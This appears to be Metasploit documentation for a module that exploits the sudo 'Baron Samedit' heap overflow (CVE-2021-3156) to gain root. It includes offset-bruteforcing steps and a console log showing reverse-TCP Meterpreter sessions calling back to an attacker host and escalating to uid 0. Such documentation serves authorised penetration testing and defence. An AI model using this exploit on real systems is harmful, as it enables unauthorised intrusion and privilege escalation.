## Vulnerable Application

A heap based buffer overflow exists in the sudo command line utility that can be exploited by a local attacker
to gain elevated privileges. The vulnerability was introduced in July of 2011 and affects version 1.8.2
through 1.8.31p2 as well as 1.9.0 through 1.9.5p1 in their default configurations. The technique used by this
implementation leverages the overflow to overwrite a `service_user` struct in memory to reference an attacker
controlled library which results in it being loaded with the elevated privileges held by sudo.

### Manual Target

The exploit requires a number of lengths / offsets to function correctly. The manual target can be used to specify
these values if they are known. To identify the values, use the `brute.sh` script from the original PoC repository at
[blasty/CVE-2021-3156][1].

On the target system, the rough steps include:

1. Clone the repository, install necessary build tools and GNU parallel (`sudo apt-get install parallel` on Debian-based
  systems)
1. Do: `make brute`
1. Do: `./brute.sh ...` with the desired options to bruteforce, (see the [README.md][2])
1. Wait for the bruteforce to complete, hopefully finding a successful option.

    Successful results will be written to the `success.txt` file. They will look something like this:
    
    ```
    ** CVE-2021-3156 PoC by blasty <peter@haxx.in>
    
    using target: Manual ['/usr/bin/sudoedit'] (56, 57, 60, 200)
    ** pray for your rootshell.. **
    [+] bl1ng bl1ng! We got it!
    ```
    
    In this case `56, 57, 60, 200` are the required values.

1. From Metasploit
    1. Do: `set TARGET Manual` to specify the manual target
    1. Do: `set Lengths 56, 57, 60, 200` to set the explicit lengths (substitute the numbers as necessary)

## Verification Steps
Example steps in this format (is also in the PR):

1. Install the application
1. Start msfconsole
1. Do: `use exploit/linux/local/sudo_baron_samedit`
1. Set the necessary options (target, payload, etc.)
1. Do: `run`

## Options

### WritableDir

A directory where you can write files. The necessary source code will be uploaded and compiled to here, along with the
payload library.

### Lengths
*This is an advanced option.*

The lengths to set as used by the manual target. See the "Manual Target" section.

## Scenarios

### Ubuntu 20.04.1 x64

```
msf6 exploit(multi/ssh/sshexec) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444
[*] 192.168.159.34:22 - Sending stager...
[*] Command Stager progress -  42.75% done (342/800 bytes)
[*] Sending stage (980808 bytes) to 192.168.159.34
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.34:47868) at 2021-02-11 11:55:21 -0500
[!] Timed out while waiting for command to return
[*] Command Stager progress - 100.00% done (800/800 bytes)

meterpreter > getuid
Server username: smcintyre @ ubuntu (uid=1000, gid=1000, euid=1000, egid=1000)
meterpreter > sysinfo
Computer     : 192.168.159.34
OS           : Ubuntu 20.04 (Linux 5.8.0-41-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/ssh/sshexec) > use exploit/linux/local/sudo_baron_samedit
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/sudo_baron_samedit) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/sudo_baron_samedit) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(linux/local/sudo_baron_samedit) > set TARGET Automatic
TARGET => Automatic
msf6 exploit(linux/local/sudo_baron_samedit) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated. sudo 1.8.31 maybe a vulnerable build.
[*] Using automatically selected target: Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)
[*] Writing '/tmp/libnss_9S9MeS/tB8M .so.2' (564 bytes) ...
[*] Sending stage (3008420 bytes) to 192.168.159.34
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.34:47870) at 2021-02-11 11:55:56 -0500
[+] Deleted /tmp/p60htQTDNO
[+] Deleted /tmp/libnss_9S9MeS/tB8M .so.2
[+] Deleted /tmp/libnss_9S9MeS

meterpreter > getuid
Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 192.168.159.34
OS           : Ubuntu 20.04 (Linux 5.8.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

[1]: https://github.com/blasty/CVE-2021-3156
[2]: https://github.com/blasty/CVE-2021-3156/blob/da68f7c1a2961595a3226b903f1fc180b8824255/README.md#bruteforce-target-finding-experimental
